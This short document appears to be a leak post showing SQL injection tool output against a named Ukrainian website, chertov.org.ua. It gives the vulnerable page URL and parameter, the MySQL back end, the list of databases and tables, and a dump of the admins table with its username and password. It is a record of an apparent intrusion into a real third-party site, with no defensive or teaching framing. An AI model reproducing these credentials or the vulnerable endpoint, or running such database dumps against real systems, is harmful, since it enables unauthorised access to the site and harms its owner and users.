.org organization

.ua Ukraine

The solution of Chertov Vorobyov | chertov.org.ua

https://www.chertov.org.ua/viewparagrafs.php?id=2 

the back-end DBMS: MySQL >= 5.0

available databases [2]:
[+] chertov.org.ua
[+] information_schema

Database: chertov.org.ua
[11 tables]
+-----------+
| options   |
| admins    |
| articles  |
| feedback  |
| glavs     |
| news      |
| pages     |
| paragrafs |
| zadac     |
| zadachi   |
| zakaz     |
+-----------+

Database: chertov.org.ua
Table: admins
[1 entry]
+-----------+-----------+
| user_name | user_pass |
+-----------+-----------+
| admin     | admin     |
+-----------+-----------+
